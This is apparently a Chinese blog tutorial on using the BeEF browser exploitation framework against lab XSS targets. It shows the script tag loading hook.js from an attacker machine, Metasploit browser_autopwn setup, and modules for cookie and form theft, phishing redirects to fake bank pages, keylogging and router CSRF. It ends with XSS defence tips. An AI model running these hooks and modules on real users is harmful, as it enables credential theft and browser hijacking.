xss漏洞原理(五)BeEF

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: xss漏洞原理(五)BeEF

简介

image.png

BeEF(The Browser Exploitation Framework)是一款针对浏览器的渗tou测试工具。它集成了许多payload,可以实现多种功能,并支持API调用,用户可以编写自己的模块。在Kali Linux系统上,BeEF工具已经自动安装。

当我们打开BeEF时,会看到登录页面。该页面提供了两条信息:一条是BeEF的XSS引用地址,即本地IP的3000端口下的hook.js;另一条是BeEF的管理页面,即本地地址/ui/panel。

在当前Kali Linux系统上,BeEF已经开始监听3000端口。我们可以访问BeEF的管理页面,并使用默认的用户名和密码(beef)登录。

总结起来,BeEF是一款功能强大的浏览器渗tou测试工具,可以用于学习和交流目的。但请注意,严禁利用该工具进行非法行为,否则后果自负。

功能

信息收集

image.png

BEEF(Browser Exploitation Framework)是一个用于浏览器漏洞利用的框架,它可以用于信息收集、网络钓鱼、会话劫持等公鸡。下面是使用BEEF进行信息收集的步骤:

启动BEEF:在终端中切换到BEEF所在的目录,并运行以下命令启动BEEF:

cd /usr/share/beef-xss/

./beef

1.

2.

配置BEEF:在浏览器中访问http://localhost:3000/ui/panel,进入BEEF的控制面板。在控制面板中,你可以配置BEEF的各种设置,包括监听地址、端口、HTTPS证书等。

创建钓鱼页面:在BEEF的控制面板中,点击"Modules"选项卡,然后选择"Phishing"模块。在该模块中,你可以创建钓鱼页面,用于诱骗目标用户输入敏感信息。

发送钓鱼链接:将生成的钓鱼页面链接发送给目标用户,诱使其点击并输入敏感信息。

收集信息:一旦目标用户点击了钓鱼链接并输入了敏感信息,BEEF将会收集到这些信息,并在控制面板中显示。

请注意,使用BEEF进行信息收集等活动可能涉及到违法行为,且可能对他人造成损害。请确保你在合法授权的范围内使用BEEF,并遵守相关法律法规。

持久化控制

image.png

BEEF(Browser Exploitation Framework)是一个用于公鸡浏览器的框架,它可以帮助公鸡者获取对受害者浏览器的控制权。在获得对僵尸浏览器的初始化控制后,持久化控制是非常重要的,以便为后续的公鸡提供更多时间。

持久化控制主要包括两个方面:持久通信和持久存续。

持久通信:持久通信是指BeEF服务器和僵尸浏览器之间的通信技术选择。高级的通信技术可以提供更快的速度。BeEF使用各种通信技术,如AJAX、WebSockets和长轮询等,来确保与僵尸浏览器之间的持久通信。

持久存续:持久存续是指让用户尽可能地停留在具有BeEF勾子的页面上。这可以通过多种方式实现,例如:

诱使用户点击链接或按钮,以防止页面跳转到新页面。

使用JavaScript代码来阻止页面关闭事件,以便用户无法关闭页面。

使用各种技术(如IFrame、弹出窗口等)来打开新的浏览器窗口,以便用户保持在具有BeEF勾子的页面上。

需要注意的是,持久化控制也有一些限制和缺点。例如,无法加载图片和某些特定的页面操作(如点击导航菜单中的链接)可能导致页面跳转,从而失去对浏览器的控制权

社会工程

image.png

BeEF(Browser Exploitation Framework)是一个强大的开源渗tou测试框架,它可以用于进行社会工程公鸡。通过BeEF,公鸡者可以利用浏览器漏洞来获取目标用户的浏览器信息、键盘记录等敏感信息。

下面是一个使用BeEF进行社会工程公鸡的示例:

首先,你需要安装和配置BeEF。你可以从官方网站(http://beefproject.com)下载BeEF,并按照官方文档进行安装和配置。

一旦安装和配置完成,你可以启动BeEF服务。

接下来,你需要获取目标用户的浏览器连接。你可以通过发送钓鱼邮件、社交媒体欺骗等方式来引诱目标用户点击恶意链接。

当目标用户点击恶意链接并访问了你的BeEF服务器时,你将能够在BeEF控制台中看到目标用户的浏览器连接。

一旦你获得了目标用户的浏览器连接,你可以利用BeEF的各种模块进行社会工程公鸡

。例如,你可以使用键盘记录模块来记录目标用户的键盘输入,者使用浏览器信息模块来获取目标用户的浏览器版本和操作系统信息。

需要注意的是,进行社会工程公鸡是违法行为,重侵犯了他人的隐私和安全。请确保你在合法的环境中使用BeEF,并遵守相关法律法规。

image.png

BEEF(The Browser Exploitation Framework)是一个专注于利用浏览器漏洞的Web框架公鸡平台。它可以用于合法的研究和测试目的。通过BEEF,公鸡者可以利用浏览器漏洞来获取目标主机的用户名和密码,甚至可以获取目标主机的shell访问权限。

BEEF的使用方法如下:

首先,你需要安装和配置BEEF。你可以从BEEF的官方网站(https://beefproject.com/)下载最新版本的BEEF,并按照官方文档进行安装和配置。

安装和配置完成后,你可以启动BEEF。在启动BEEF之后,它将监听一个特定的端口(默认为3000)。

接下来,你需要诱使目标用户访问你的恶意网站。你可以通过发送钓鱼邮件、社交工程等方式来引诱目标用户点击你的恶意链接。

当目标用户访问你的恶意网站时,BEEF将会自动检测目标用户的浏览器漏洞,并尝试利用这些漏洞。

如果成功利用了浏览器漏洞,BEEF将会建立一个与目标用户浏览器的连接,并提供一系列公鸡

模块和功能,包括获取目标主机的用户名和密码,以及获取目标主机的shell访问权限。

需要注意的是,BEEF是一个强大的工具,但在使用时必须遵守法律和道德规范。只能在合法的研究和测试目的下使用,不得用于非法活动。

基础使用

启动服务  

图形启动

image.png

点击Kali Linux BeEF图标

这里还是需要手工启动Apache服务

故障解决  

命令启动

image.png

root@kali:~# service apache2 start

root@kali:~# cd /usr/share/beef-xss/

root@kali:/usr/share/beef-xss# ./beef

[*] Please wait as BeEF services are started.

[*] You might need to refresh your browseronce it opens.

[*] UI URL: http://127.0.0.1:3000/ui/panel

[*] Hook: <script src="http://<IP>:3000/hook.js"></script>

[*] Example: <script src=" http://127.0.0.1:3000/hook.js"></script>      

Hook脚本  

<script src="172.16.70.216:3000/hook.js"></script>  

这里的IP地址172.16.70.216即启动了BeEF的主机  

登录BeEF

image.png

账号密码beef/beef  

检查脚本

渗tou机器上访问"本机地址:3000/hook.js",保证 能看到公鸡脚本  

image.png

靶机测试

环境地址说明

image.png

将脚本放在Mutillidae靶机中

image.png

image.png

说明

在chrome下执行这段脚本,会出现安全拦截报错,建议用ie或者firefox  

<script src="172.16.70.216:3000/hook.js"></script>  

将脚本放在DWVA靶机中

由于这个页面存在字数限制,所以需要修改前端代码  

例如Firebug来修改  

在Windows 7访问此XSS页面

image.png

访问之后上去也没有任何异常,但此时的脚本其实已经运行了  

除了WIN7访问这个页面,Kali 自己刷新页面,也会自己上钩  

说明

image.png

IE不行的话,再用Chrome访问

在BeEF页面,可以看到肉鸡上线

image.png

只要肉鸡浏览器不关闭,这里就可以一直控制它  

整个过程,对于肉鸡来说,没有发现有任何问题  

服务管理

命令帮助

image.png

BeEF是一个用于浏览器漏洞利用的框架,它可以帮助安全研究人员测试和演示各种Web浏览器的安全漏洞。下面是一些常用的BeEF命令和其功能:

beef-xss: 启动BeEF框架。

beef: 启动BeEF控制台。

beef -h 或 beef --help: 显示BeEF命令的帮助信息。

beef -v 或 beef --version: 显示BeEF框架的版本信息。

beef -c <config_file>: 使用指定的配置文件启动BeEF框架。

beef -p <port>: 指定BeEF框架监听的端口号。

beef -s: 启动BeEF框架并在后台运行。

beef -x <command>: 执行指定的BeEF命令。

你可以使用上述命令来启动BeEF框架、控制台以及执行其他相关操作。更多关于BeEF框架的详细信息和使用方法,你可以参考BeEF框架的官方文档: https://github.com/beefproject/beef/wiki

开启服务  

image.png

以下是开启BeEF服务的步骤:

首先,确保已经安装了BeEF。如果还没有安装,请按照官方文档或相关教程进行安装。

打开终端,并输入以下命令来启动Apache服务:

sudo service apache2 start

确保Apache服务已经成功启动后,再输入以下命令来启动BeEF:

sudo beef-xss

当看到类似于以下信息时,表示BeEF服务已经成功启动:

复制  

[INFO]  BeEF is running at: http://127.0.0.1:3000/ui/panel

请注意,BeEF默认监听在本地的3000端口。您可以在浏览器中访问上述URL来打开BeEF的控制面板。

重置数据库

image.png

如果您想要重置数据库,可以使用MySQL的命令行工具或者图形化界面工具来执行相应的操作。以下是使用MySQL命令行工具重置数据库的步骤:

打开命令行终端或者命令提示符。

使用以下命令登录到MySQL数据库:

mysql -u 用户名 -p

其中,用户名是您的MySQL数据库用户名。执行该命令后,系统会提示您输入密码。

输入密码后,按回车键登录到MySQL数据库。

使用以下命令选择要重置的数据库:

USE 数据库名;

其中,数据库名是您要重置的数据库的名称。

使用以下命令删除数据库中的所有表:

DROP TABLE 表名1, 表名2, ...;

其中,表名1, 表名2, …是您要删除的表的名称。如果要删除所有表,可以使用以下命令:

SHOW TABLES;

该命令会显示数据库中的所有表,然后您可以逐个删除这些表。

重置数据库完成后,您可以重新创建表和插入数据。

请注意,重置数据库将删除数据库中的所有表和数据,因此请谨慎操作并确保您已经备份了重要的数据。

关闭服务

image.png

root@kali:~# service apache2 stop  

root@kali:/usr/share/beef-xss# service beef￾xss stop  

使用方法

信息收集

目标详情(Detail)


image.png

image.png

image.png

以前抓肉鸡,需要各种灰鸽子、冰河木目马等后门 程序,配合系统漏洞来实现

现在仅需要一个链接,就可以批量抓肉鸡,而随着社交网络、云计算机、Web应用的发展  

越来越多基于Web/浏览器的公鸡技术会出现,配合社会工程师和蠕虫,完全可以实现大规模的网 络公鸡

命令颜色(Color)

image.png

绿色 对目标主机生效并且不可见(不会被发现)

橙色 对目标主机生效但可能可见(可能被发现)

灰色 对目标主机未必生效(可验证下)

红色 对目标主机不生效  

浏览器(Brower)  

检测信息(detect)

image.png

检测浏览器类型

检测是否有firebug插件

检测是否有Foxit Reader插件

检测是否可以访问某个URL

检测是否允许访问摄像头  

获取信息(get)

image.png


获取cookie信息

获取表单信息

获取HTML

获取HREF             此页面的URL链接  

修改信息(replace)

image.png

修改链接

修改视频  

创建信息(create)

image.png

警告框create alert Dialog

对话框create prompt dialog  

重定向(redirect)  

image.png

重定向到目标网站  

目标网站可以设置为一个伪装的支付宝/网银/网游登录页面  

重定向并处于加载状态

实际上已经重定向到另外的网站了,但是为了伪 装,让页面处于加载状态  

重定向到iframe页面

实际上已经重定向到另外的网站了,但是为了伪 装,通过iframe页面将页面处于空白状态  

其他功能

image.png

主机(Host)

image.png


获取内部地址

检测是否在虚拟机里

hook其他浏览器  

网络(Network)

image.png

端口扫描

PING扫描

DOS公鸡

插件(Chrome Extensions)  

持久化控制

image.png


中间人公鸡  

用户点击其他链接,浏览器不跳,保留在原来页面  

关闭确认弹框

小窗口  

漏洞利用

本地主机(local host)

image.png

基于ms漏洞拿shell

win xp下测试

win7下测试  

基于ms漏洞获取shell的方法有很多种,具体的方法取决于具体的漏洞类型和系统环境。以下是一种常见的基于ms漏洞获取shell的方法:

首先,你需要找到一个已知的ms漏洞,可以通过漏洞扫描工具或者漏洞数据库来查找。

一旦找到了目标漏洞,你需要了解该漏洞的利用方式和公鸡

方法。这通常需要对漏洞进行深入研究,包括查找已有的漏洞利用脚本或工具。

接下来,你需要准备一个公鸡

环境,包括安装必要的工具和软件。这可能包括渗头测试工具、代理服务器、漏洞利用框架等。

一旦准备好公鸡

环境,你可以开始执行漏洞利用。这可能涉及到发送特制的恶意请求、利用系统漏洞、绕过安全措施等。

如果漏洞利用成功,你将能够获取对目标系统的访问权限。这可能包括获取shell访问权限、提升权限、获取管理员权限等。

需要注意的是,进行任何形式的公鸡都是非法的,除非你有合法的授权和目的。在进行任何安全测试或渗头测试之前,请确保你已经获得了合法的授权,并且只在合法的环境中进行测试。

摄像头(Camera)

简介

基于CSRF(跨站伪造请求),修改网络摄像机的管理密码  

路由器(Router)

简介

image.png

基于CSRF(跨站伪造请求),假设目标用户已经登录了路由器,则可以执行以下功能

修改登录密码、关闭防火墙、开启远程管理(80/23)

修改DNS服务器、重启路由器

支持cisco、3com、huawei、TP-link等路由器

交换机(Switch)  

功能同路由器渗头模块类似  

Metasploit

Metasploit设置

image.png

使用浏览器载荷,开启监听端口,等待肉鸡访问  

Kali 的MSF需要解决数据库问题

update-rc.d postgresql enable 开启启动

service postgresql start 启动数据库

service metasploit start 启动msf

msfupdate 更新msf

msfconsole 进行msf

msf > db_status 检测数据库连接

apt-get install metasploit-framework 更新msf  

针对winxp和2003成功几率大

操作

image.png

MSF操作

msfconsole 进入MSF

search browser

_

autopwn 搜索浏览器模块

use auxiliary/server/browser

_

autopwn 使用模块

show options 查看配置信息

set LHOST 172.16.70.216  

设置本机IP

set SRVHOST 172.16.70.216  

set URIPATH / 设置后缀信息

exploit  

执行截图

BeEF设置

说明 让肉鸡访问Metasploit的监听地址  

社会工程公鸡 Social Engineering  

点击劫持

image.png

clickjacking  

谷歌钓鱼

image.png

image.png

Facebook钓鱼


image.png

image.png


虚假更新

image.png

image.png


其他功能


image.png

Rider  

Forge Request  

GET / HTTP/1.1

Host: bing.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8

Connection: close  

xss防御

image.png

1、Web客户端和服务端脚本对用户输入输出字符进行安全过滤和转义

<

>

script

htmlspecialchars  

2、Web服务器安装WAF/IDS/IPS等安全产品,拦截公鸡代码

image.png

image.png

image.png

3、浏览器设置为高安全级别,Cookie属性HttpOnly设置为true,防止被JS调用  

浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie  

4、关闭浏览器自动密码填写功能,防止被钓鱼页面/表单调取账号密码  

可选

方便了用户,也让用户更加的危险



相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
7天前
|
安全
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
7天前
|
开发框架 安全 JavaScript
xss漏洞原理(四)自动化XSS
xss漏洞原理(四)自动化XSS
|
6天前
|
Web App开发 JavaScript 前端开发
|
7天前
|
存储 Web App开发 安全
XSS漏洞原理(三)存储型
XSS漏洞原理(三)存储型
|
7天前
|
安全 Apache PHP
XSS漏洞理由(二)反射型
XSS漏洞理由(二)反射型
|
3月前
|
存储 安全 JavaScript
手摸手带你进行XSS攻击与防御
当谈到网络安全和信息安全时,跨站脚本攻击(XSS)是一个不可忽视的威胁。现在大家使用邮箱进行用户认证比较多,如果黑客利用XSS攻陷了用户的邮箱,拿到了cookie那么就可以冒充你进行收发邮件,那真就太可怕了,通过邮箱验证进行其他各种网站的登录与高危操作。 那么今天,本文将带大家深入了解XSS攻击与对应的防御措施。
|
23天前
|
存储 安全 JavaScript
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
这篇文章详细解释了XSS跨站脚本攻击的概念、原理、特点、类型,并提供了攻击方式和防御方法。
42 1
|
9天前
|
存储 JavaScript 安全
|
9天前
|
存储 JavaScript 前端开发
Xss跨站脚本攻击(Cross Site Script)
Xss跨站脚本攻击(Cross Site Script)
|
3月前
|
SQL 安全 数据库
Python Web开发者必学:SQL注入、XSS、CSRF攻击与防御实战演练!
【7月更文挑战第26天】在 Python Web 开发中, 安全性至关重要。本文聚焦 SQL 注入、XSS 和 CSRF 这三大安全威胁,提供实战防御策略。SQL 注入可通过参数化查询和 ORM 框架来防范;XSS 则需 HTML 转义用户输入与实施 CSP;CSRF 防御依赖 CSRF 令牌和双重提交 Cookie。掌握这些技巧,能有效加固 Web 应用的安全防线。安全是持续的过程,需贯穿开发始终。
77 1
Python Web开发者必学:SQL注入、XSS、CSRF攻击与防御实战演练!